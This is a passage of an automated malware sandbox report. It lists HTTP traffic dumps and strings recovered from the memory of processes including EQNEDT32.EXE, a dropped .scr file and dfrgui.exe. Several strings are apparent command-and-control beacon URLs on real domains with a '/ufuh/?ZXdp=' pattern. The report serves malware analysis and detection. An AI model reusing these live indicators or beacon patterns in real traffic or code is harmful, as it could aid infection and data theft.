33 fc 51 4e 18 84 89 8a b7 e5 25 e6 f8 c8 31 49 7a 17 52 41 8e ba 52 ae ce 07 e3 a3 f1 6e 5d ef f4 76 11 7f f5 a5 08 f3 54 c4 ac ad ed 2a 8f bf fd 3d f8 f9 6e 5d b3 5e db 4d 48 7a 62 30 9c 84 1b 71 ca 5d 08 de 0e 16 51 6f c3 e8 c1 5d b8 51 0d 93 ca 1e 17 ae e4 02 09 ee 0d 32 99 19 16 56 98 28 01 96 a9 34 48 45 04 30 ce 6f 9c f5 13 98 92 3a 5e 35 ce 8c 75 86 3e ca 69 cb 78 f1 bb ff 3c ff e2 2b 53 eb f5 dd e6 ef 60 1c d7 cd ff a3 ae cf 7f f3 c5 b3 a7 9f 5c 46 65 00 b7 0f 71 c2 cb ba 4f fc 6b 00 39 9f 0e bc c7 83 0c f7 e9 31 39 c0 42 80 6b 72 23 34 46 66 1b 71 fc b0 14 d9 87 f5 c3 3a 58 4b a6 8f c3 3a e9 83 cf f2 43 60 ce f0 61 5d 2d 3e ac 37 b6 3c df f3 Data Ascii: d43Zoo=l!)Jv
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 03 Jun 2024 06:54:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 64 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 5a 6f 6f db c6 19 7f 3d 7f 0a 8a c5 6c b2 21 29 4a 76 1c 8f 32 93 b6 ae 3b 74 4b 97 22 4e 50 14 b1 11 9c c8 93 74 36 c5 63 ef 8e 96 55 45 40 87 0d c3 d0 6e 7d d3 0d 2b 86 0e d8 80 02 1b f6 aa d8 1f 34 2f f6 89 12 e7 3b ec b9 3b 4a a2 24 aa 8e 1d 77 43 02 8a bc 7b ee 79 9e fb 3d 7f 8f f4 6e ed ed 7b 7b 0f 3e 7c 7f df e8 89 7e 72 7b 6d 57 fe 18 09 4a bb a1 79 42 dd 9f de 37 e5 18 46 f1 ed b5 1f ec f6 b1 40 46 d4 43 8c 63 11 9a 0f 1f bc e3 ee 98 46 7d 3a 93 a2 3e 0e cd 53 82 07 19 65 c2 34 22 9a 0a 9c 02 e5 80 c4 a2 17 c6 f8 94 44 d8 55 0f 8e 41 52 22 08 4a 5c 1e a1 04 87 0d c5 a7 c4 66 83 d1 36 15 7c 63 ca 64 23 a5 24 8d f1 99 63 74 68 92 d0 c1 86 5c 00 92 6b ae 6b 3c e8 11 6e 70 22 b0 01 bf 34 13 a4 4f 3e c6 b1 31 20 a2 67 88 1e 36 3e a4 88 0b e3 60 ff 9e 91 25 79 97 a4 c6 69 b3 e9 ed 18 2e ec 59 64 3c a8 d7 87 92 c0 8b 68 bf 3e a0 2c ce 18 e6 bc ae 49 79 9d 63 5a 37 5c 77 ba cb 8c d1 0c 33 31 0c 4d da 0d 12 2a d5 2f 6d f5 84 3e 06 cc 4a a0 cc 91 0b 22 e6 a8 5f 7c fe e5 f9 9f fe 75 fe d7 4f 9e 7d f3 89 71 fe 87 5f 9d 7f fa ef e7 9f fd fa f9 67 5f 7b a0 1c cc bc f8 fc e9 8b df 7f 75 fe cb a7 e7 bf f8 b9 71 fe d9 9f 9f fd f3 2f f0 f3 d5 b3 6f 9f 02 d9 f9 3f be 7c fe ed 37 c6 f3 bf ff ed f9 6f 81 ec cb f3 3f 7e 73 fe e9 d7 2b 65 4b 7c 1e 4b 6c 4b f2 5f 49 04 8f 18 c9 84 21 86 19 58 1d 65 59 42 22 24 08 4d eb 49 7c e3 98 d3 14 e4 24 88 f3 d0 54 e8 82 a1 7b b8 8f dc 2e 43 59 cf bc 3d 32 df 50 5a 9c 09 33 30 27 66 d0 24 1e 65 5d d3 31 df d0 94 c1 23 20 95 32 80 ee 03 dc 3e 80 5d c8 49 12 97 d6 1d a7 27 04 78 31 14 09 72 8a c1 8e de 09 ab bf 36 c0 6d ae a9 73 96 5c 44 0d 54 0a 9b e0 aa 98 38 66 8c 35 22 00 01 b0 81 81 8c 4a 94 c1 c9 df 8c f4 60 69 2b 07 18 b1 a8 57 4c 38 a6 40 ac 8b 01 8a 19 c1 7e 2a d8 f0 7d f0 79 a1 37 f0 00 f7 b3 04 09 7c d1 46 ee f0 70 c4 15 f3 c7 30 d5 7f cc 05 23 69 77 6c 8e 1d f3 a3 1c b3 a1 4b d2 2c 97 a0 33 fc 51 4e 18 84 89 8a b7 e5 25 e6 f8 c8 31 49 7a 17 52 41 8e ba 52 ae ce 07 e3 a3 f1 6e 5d ef f4 76 11 7f f5 a5 08 f3 54 c4 ac ad ed 2a 8f bf fd 3d f8 f9 6e 5d b3 5e db 4d 48 7a 62 30 9c 84 1b 71 ca 5d 08 de 0e 16 51 6f c3 e8 c1 5d b8 51 0d 93 ca 1e 17 ae e4 02 09 ee 0d 32 99 19 16 56 98 28 01 96 a9 34 48 45 04 30 ce 6f 9c f5 13 98 92 3a 5e 35 ce 8c 75 86 3e ca 69 cb 78 f1 bb ff 3c ff e2 2b 53 eb f5 dd e6 ef 60 1c d7 cd ff a3 ae cf 7f f3 c5 b3 a7 9f 5c 46 65 00 b7 0f 71 c2 cb ba 4f fc 6b 00 39 9f 0e bc c7 83 0c f7 e9 31 39 c0 42 80 6b 72 23 34 46 66 1b 71 fc b0 14 d9 87 f5 c3 3a 58 4b a6 8f c3 3a e9 83 cf f2 43 60 ce f0 61 5d 2d 3e ac 37 b6 3c df f3 Data Ascii: d43Zoo=l!)Jv
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 03 Jun 2024 06:54:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 64 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 5a 6f 6f db c6 19 7f 3d 7f 0a 8a c5 6c b2 21 29 4a 76 1c 8f 32 93 b6 ae 3b 74 4b 97 22 4e 50 14 b1 11 9c c8 93 74 36 c5 63 ef 8e 96 55 45 40 87 0d c3 d0 6e 7d d3 0d 2b 86 0e d8 80 02 1b f6 aa d8 1f 34 2f f6 89 12 e7 3b ec b9 3b 4a a2 24 aa 8e 1d 77 43 02 8a bc 7b ee 79 9e fb 3d 7f 8f f4 6e ed ed 7b 7b 0f 3e 7c 7f df e8 89 7e 72 7b 6d 57 fe 18 09 4a bb a1 79 42 dd 9f de 37 e5 18 46 f1 ed b5 1f ec f6 b1 40 46 d4 43 8c 63 11 9a 0f 1f bc e3 ee 98 46 7d 3a 93 a2 3e 0e cd 53 82 07 19 65 c2 34 22 9a 0a 9c 02 e5 80 c4 a2 17 c6 f8 94 44 d8 55 0f 8e 41 52 22 08 4a 5c 1e a1 04 87 0d c5 a7 c4 66 83 d1 36 15 7c 63 ca 64 23 a5 24 8d f1 99 63 74 68 92 d0 c1 86 5c 00 92 6b ae 6b 3c e8 11 6e 70 22 b0 01 bf 34 13 a4 4f 3e c6 b1 31 20 a2 67 88 1e 36 3e a4 88 0b e3 60 ff 9e 91 25 79 97 a4 c6 69 b3 e9 ed 18 2e ec 59 64 3c a8 d7 87 92 c0 8b 68 bf 3e a0 2c ce 18 e6 bc ae 49 79 9d 63 5a 37 5c 77 ba cb 8c d1 0c 33 31 0c 4d da 0d 12 2a d5 2f 6d f5 84 3e 06 cc 4a a0 cc 91 0b 22 e6 a8 5f 7c fe e5 f9 9f fe 75 fe d7 4f 9e 7d f3 89 71 fe 87 5f 9d 7f fa ef e7 9f fd fa f9 67 5f 7b a0 1c cc bc f8 fc e9 8b df 7f 75 fe cb a7 e7 bf f8 b9 71 fe d9 9f 9f fd f3 2f f0 f3 d5 b3 6f 9f 02 d9 f9 3f be 7c fe ed 37 c6 f3 bf ff ed f9 6f 81 ec cb f3 3f 7e 73 fe e9 d7 2b 65 4b 7c 1e 4b 6c 4b f2 5f 49 04 8f 18 c9 84 21 86 19 58 1d 65 59 42 22 24 08 4d eb 49 7c e3 98 d3 14 e4 24 88 f3 d0 54 e8 82 a1 7b b8 8f dc 2e 43 59 cf bc 3d 32 df 50 5a 9c 09 33 30 27 66 d0 24 1e 65 5d d3 31 df d0 94 c1 23 20 95 32 80 ee 03 dc 3e 80 5d c8 49 12 97 d6 1d a7 27 04 78 31 14 09 72 8a c1 8e de 09 ab bf 36 c0 6d ae a9 73 96 5c 44 0d 54 0a 9b e0 aa 98 38 66 8c 35 22 00 01 b0 81 81 8c 4a 94 c1 c9 df 8c f4 60 69 2b 07 18 b1 a8 57 4c 38 a6 40 ac 8b 01 8a 19 c1 7e 2a d8 f0 7d f0 79 a1 37 f0 00 f7 b3 04 09 7c d1 46 ee f0 70 c4 15 f3 c7 30 d5 7f cc 05 23 69 77 6c 8e 1d f3 a3 1c b3 a1 4b d2 2c 97 a0 33 fc 51 4e 18 84 89 8a b7 e5 25 e6 f8 c8 31 49 7a 17 52 41 8e ba 52 ae ce 07 e3 a3 f1 6e 5d ef f4 76 11 7f f5 a5 08 f3 54 c4 ac ad ed 2a 8f bf fd 3d f8 f9 6e 5d b3 5e db 4d 48 7a 62 30 9c 84 1b 71 ca 5d 08 de 0e 16 51 6f c3 e8 c1 5d b8 51 0d 93 ca 1e 17 ae e4 02 09 ee 0d 32 99 19 16 56 98 28 01 96 a9 34 48 45 04 30 ce 6f 9c f5 13 98 92 3a 5e 35 ce 8c 75 86 3e ca 69 cb 78 f1 bb ff 3c ff e2 2b 53 eb f5 dd e6 ef 60 1c d7 cd ff a3 ae cf 7f f3 c5 b3 a7 9f 5c 46 65 00 b7 0f 71 c2 cb ba 4f fc 6b 00 39 9f 0e bc c7 83 0c f7 e9 31 39 c0 42 80 6b 72 23 34 46 66 1b 71 fc b0 14 d9 87 f5 c3 3a 58 4b a6 8f c3 3a e9 83 cf f2 43 60 ce f0 61 5d 2d 3e ac 37 b6 3c df f3 Data Ascii: d43Zoo=l!)Jv
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Jun 2024 06:55:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://platinummedia.info/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZlzkatmlA66cbLqjKfpjzXWw0MT7miXOw5mZZQ4AiQMNMl2fk4KZWXyVS8pX4taEp1Ur1PORK%2FKDvQ32pgCJ6yTcSnjusx37SLaH5N%2BXiG7EhlXerfbBrU4mOZrKetlvMn7DRS%2BqMt%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88ddc6a35886479c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 32 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3b fd 8f db b6 92 3f 5f 80 fb 1f b8 5a bc 8d d4 48 b2 ec fd 48 62 c7 db 4b 93 ec 5d 0f cd 4b d1 34 38 1c b2 8b 05 2d 8d 64 26 14 a9 92 94 ed 7d ae ff f7 03 49 c9 96 6c 79 ed b4 7d 38 bc 00 c1 52 c3 e1 70 38 9c 4f 92 7e 75 f2 f6 c3 9b 5f ff f7 e7 77 68 aa 72 7a fd ef 4f 5e e9 bf 88 62 96 8d 1d 60 c1 a7 8f 8e 01 02 4e f4 df 1c 14 46 f1 14 0b 09 6a ec 7c fa f5 26 78 e1 ac e1 0c e7 30 76 66 04 e6 05 17 ca 41 31 67 0a 98 1a 3b 73 92 a8 e9 38 81 19 89 21 30 1f 3e 22 8c 28 82 69 20 63 4c 61 dc d7 54 fe 0d bd a2 84 7d 45 02 e8 d8 29 04 4f 09 05 07 4d 05 a4 63 67 aa 54 21 87 bd 5e 96 17 59 c8 45 d6 5b a4 ac d7 ef 3b d7 c8 8c 53 44 51 b8 fe 19 67 80 18 57 28 e5 25 4b d0 d9 e9 8b 41 bf 3f 42 05 c5 8a b0 32 47 ef 21 21 f8 55 cf 22 37 99 7e 2a f8 84 2b f9 74 cd f2 53 c6 09 4b 60 e1 23 c6 53 4e 29 9f 3f 45 bd eb 27 0d fe 30 55 20 18 56 e0 20 f5 50 c0 d8 c1 45 41 49 8c 15 e1 ac 27 a4 7c b6 c8 a9 83 cc 54 63 a7 cd 01 3a 13 f8 b7 92 8f d0 0d 40 b2 bd c0 1a 35 d7 98 21 61 29 ef a5 00 49 cf f9 27 cc ff 86 e7 39 30 25 8f 65 24 ae f0 9b 1c c9 58 90 42 5d 3f 99 13 96 f0 79 78 3f 2f 20 e7 5f c8 47 50 8a b0 4c a2 31 5a 3a 13 2c e1 93 a0 ce b0 22 7e db bb ed c9 70 ae f7 f1 b6 47 72 9c 81 bc ed c5 5c c0 6d cf 0c be ed f5 2f c3 28 3c bf ed 3d 1f 2c 9e 0f 6e 7b 8e ef c0 42 39 43 27 2c 58 e6 f8 8e 9c 65 7f 8c 9e 9c 65 86 9a 9c 65 ef Data Ascii: 1283;?_ZHHbK]K48-d&}Ily}8Rp8O~u_whrzO^b`NFj\|&x0vfA1g;s8!0>"(i cLaT}E)OMcgT!^YE[;SDQgW(%KA?B2G!!U"7~*+tSK`#SN)?E'0U V PEAI'\|Tc:@5!a)I'90%e$XB]?yx?/ _GPL1Z:,"~pGr\m/(<=,n{B9C',Xeee
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Jun 2024 06:55:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://platinummedia.info/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a821kuDOCCK6%2FhCIL7%2BJV5M653MIEvc%2BODhvtlA%2F6wq7ZiupsJY9uufo4HCO%2B0S%2FJtkemPQ7u345JOjoCM3UA1IrWoRJ8DW93NJbf2SCw1wxeLjykmm9TmwPycFdyS62uCIBYT90gahN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88ddc6b3192a6b95-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 33 34 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 73 e3 36 92 e8 cf 2f 55 ef 7f c0 d0 b5 1e 71 86 a4 a9 2f db 23 45 de 4b e6 e3 bd 7d 95 5c b6 32 9b ba ba 9a 71 b9 20 12 92 98 a1 08 86 00 2d fb b4 fa df 5f e1 83 24 48 42 24 25 6b bc bb 77 93 54 62 11 68 34 1a 0d a0 d1 68 74 03 df bf 78 f7 cb db bf fd e7 5f df 83 15 5d 87 37 ff fb bb ef d9 5f 10 c2 68 39 33 50 64 ff f6 d1 e0 89 08 fa ec ef 1a 51 08 bc 15 4c 08 a2 33 e3 b7 bf 7d b0 af 8d 3c 3d 82 6b 34 33 ee 03 b4 89 71 42 0d e0 e1 88 a2 88 ce 8c 4d e0 d3 d5 cc 47 f7 81 87 6c fe 61 81 20 0a 68 00 43 9b 78 30 44 b3 3e c3 f2 bf c0 f7 61 10 7d 01 09 0a 67 46 9c e0 45 10 22 03 ac 12 b4 98 19 2b 4a 63 32 b9 b8 58 ae e3 a5 83 93 e5 c5 c3 22 ba e8 f7 8d 1b c0 cb d1 80 86 e8 e6 af 70 89 40 84 29 58 e0 34 f2 c1 f9 d9 f5 a0 df 9f 82 38 84 34 88 d2 35 f8 19 f9 01 fc fe 42 00 ab 44 bf 4c f0 1c 53 f2 32 27 f9 65 84 83 c8 47 0f 16 88 f0 02 87 21 de bc 04 17 37 df 29 f4 c1 90 a2 24 82 14 19 80 3e c6 68 66 c0 38 0e 03 0f d2 00 47 17 09 21 af 1f d6 a1 01 78 55 33 a3 4c 01 38 4f e0 1f 29 9e 82 0f 08 f9 d5 06 66 a0 6b 06 e9 04 d1 02 5f 2c 10 f2 2f 8c af 50 ff 5b bc 5e a3 88 92 ae 84 78 12 5e a5 88 78 49 10 d3 9b ef 36 41 e4 e3 8d 73 b7 89 d1 1a ff 1e 7c 44 94 06 d1 92 80 19 d8 1a 73 48 d0 6f 49 68 4c 24 f2 cf 17 9f 2f 88 b3 61 fd f8 f9 22 58 c3 25 22 9f 2f 3c 9c a0 cf 17 bc f0 e7 8b fe d8 71 9d e1 e7 8b ab Data Ascii: 2341}s6/Uq/#EK}\2q -_$HB$%kwTbh4htx_]7_h93PdQL3}<=k43qBMGla hCx0D>a}gFE"+Jc2X"p@)X4845BDLS2'eG!7)$>hf8G!xU3L8O)fk_,/P[^x^xI6As\|DsHoIhL$/a"X%"/<q
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Jun 2024 06:55:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://platinummedia.info/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPhcznM%2Fge%2BkD%2BoXrylZ2XUG81kql9N7ig4D%2FBTb0QNCb8abwaxA1ffidOfVaG1kX5R%2Bh5idcWzBa%2Bit21F3SXoI4IjqTaxpImgtlaC98XllTYApx%2BpDPqGYZnNU8vTG%2Bt6DDGxKzDKi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88ddc6c2ed776994-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 32 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3b fd 8f db b6 92 3f 5f 80 fb 1f b8 5a bc 8d d4 48 b2 ec fd 48 62 c7 db 4b 93 ec 5d 0f cd 4b d1 34 38 1c b2 8b 05 2d 8d 64 26 14 a9 92 94 ed 7d ae ff f7 03 49 c9 96 6c 79 ed b4 7d 38 bc 00 c1 52 c3 e1 70 38 9c 4f 92 7e 75 f2 f6 c3 9b 5f ff f7 e7 77 68 aa 72 7a fd ef 4f 5e e9 bf 88 62 96 8d 1d 60 c1 a7 8f 8e 01 02 4e f4 df 1c 14 46 f1 14 0b 09 6a ec 7c fa f5 26 78 e1 ac e1 0c e7 30 76 66 04 e6 05 17 ca 41 31 67 0a 98 1a 3b 73 92 a8 e9 38 81 19 89 21 30 1f 3e 22 8c 28 82 69 20 63 4c 61 dc d7 54 fe 0d bd a2 84 7d 45 02 e8 d8 29 04 4f 09 05 07 4d 05 a4 63 67 aa 54 21 87 bd 5e 96 17 59 c8 45 d6 5b a4 ac d7 ef 3b d7 c8 8c 53 44 51 b8 fe 19 67 80 18 57 28 e5 25 4b d0 d9 e9 8b 41 bf 3f 42 05 c5 8a b0 32 47 ef 21 21 f8 55 cf 22 37 99 7e 2a f8 84 2b f9 74 cd f2 53 c6 09 4b 60 e1 23 c6 53 4e 29 9f 3f 45 bd eb 27 0d fe 30 55 20 18 56 e0 20 f5 50 c0 d8 c1 45 41 49 8c 15 e1 ac 27 a4 7c b6 c8 a9 83 cc 54 63 a7 cd 01 3a 13 f8 b7 92 8f d0 0d 40 b2 bd c0 1a 35 d7 98 21 61 29 ef a5 00 49 cf f9 27 cc ff 86 e7 39 30 25 8f 65 24 ae f0 9b 1c c9 58 90 42 5d 3f 99 13 96 f0 79 78 3f 2f 20 e7 5f c8 47 50 8a b0 4c a2 31 5a 3a 13 2c e1 93 a0 ce b0 22 7e db bb ed c9 70 ae f7 f1 b6 47 72 9c 81 bc ed c5 5c c0 6d cf 0c be ed f5 2f c3 28 3c bf ed 3d 1f 2c 9e 0f 6e 7b 8e ef c0 42 39 43 27 2c 58 e6 f8 8e 9c 65 7f 8c Data Ascii: 1283;?_ZHHbK]K48-d&}Ily}8Rp8O~u_whrzO^b`NFj\|&x0vfA1g;s8!0>"(i cLaT}E)OMcgT!^YE[;SDQgW(%KA?B2G!!U"7~*+tSK`#SN)?E'0U V PEAI'\|Tc:@5!a)I'90%e$XB]?yx?/ _GPL1Z:,"~pGr\m/(<=,n{B9C',Xe

Source: dfrgui.exe, 00000008.00000002.878728836.0000000003620000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000003BC0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://aceautocorp.com/ufuh/?ZXdp=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.i
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: dfrgui.exe, 00000008.00000002.878728836.0000000003C68000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000004208000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://jnkinteractive.co.kr/ufuh/?ZXdp=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UM
Source: dfrgui.exe, 00000008.00000002.878728836.00000000037B2000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000003D52000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://mrart.co.kr/ufuh/?ZXdp=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: dfrgui.exe, 00000008.00000002.878728836.00000000042B0000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000004850000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://platinummedia.info/ufuh/?ZXdp=QOfqZ3C365rWM5PNnqKgcYVw/D14oMJ0U94Qap1ZDEZ76SuXpRuIURFJIFOuyM
Source: sharon48399.scr, 00000005.00000000.359620177.0000000000B22000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.878728836.00000000028CC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878275835.00000000001C0000.00000004.00000020.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000002E6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.000000000072C000.00000004.80000000.00040000.00000000.sdmp, sharon[1].scr.2.dr, sharon48399.scr.2.dr	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: sharon48399.scr, 00000005.00000000.359620177.0000000000B22000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.878728836.00000000028CC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878275835.00000000001C0000.00000004.00000020.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000002E6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.000000000072C000.00000004.80000000.00040000.00000000.sdmp, sharon[1].scr.2.dr, sharon48399.scr.2.dr	String found in binary or memory: http://schemas.datacontract.org/2004/07/3WebScriptEnablingBehavior
Source: sharon48399.scr.2.dr	String found in binary or memory: http://tools.ietf.org/html/rfc4287
Source: sharon48399.scr, 00000005.00000000.359620177.0000000000B22000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.878728836.00000000028CC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878275835.00000000001C0000.00000004.00000020.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000002E6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.000000000072C000.00000004.80000000.00040000.00000000.sdmp, sharon[1].scr.2.dr, sharon48399.scr.2.dr	String found in binary or memory: http://validator.w3.org/feed/docs/rss2.html
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878421508.000000000053F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.elenagilherrero.com
Source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878421508.000000000053F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.elenagilherrero.com/ufuh/
Source: sharon48399.scr.2.dr	String found in binary or memory: http://www.rfc-editor.org/rfc/rfc5023.txt
Source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000452C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.riveramayahousing.com/?fp=ueCFDhaecdvYVx8hbKh0614IfmGTEHuPdqyahOjyxp4IVfeqXdoWoHmcCZPB3lc
Source: dfrgui.exe, 00000008.00000002.878728836.0000000002E46000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.00000000033E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.0000000000CA6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: dfrgui.exe, 00000008.00000002.878728836.0000000002E46000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.00000000033E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.481558845.0000000000CA6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
